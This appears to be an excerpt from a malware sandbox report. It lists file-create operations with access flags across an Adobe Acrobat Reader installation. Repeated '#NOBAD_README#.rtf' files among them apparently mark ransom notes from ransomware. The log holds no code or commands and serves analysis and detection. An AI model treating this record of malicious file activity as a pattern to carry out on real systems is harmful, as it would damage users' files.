| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\createpdfupsell-app-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\AdobePDF417.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\tr-tr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\drvSOFT.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Checkmark_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_Checkmark_White@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\create_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-up.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\info.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm\PMP\QRCode.pmp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\css\main-selector.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\init.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\A12_Spinner_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-tool-view.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ccloud.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\editpdf-selector.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\example_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sl-si\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\adobe_sign_tag.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_AddBlue@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\A12_AddBlue@1x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check.cur | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check.cur | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x.cur | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\x_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\eu-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\A12_Spinner_2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\sample-thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
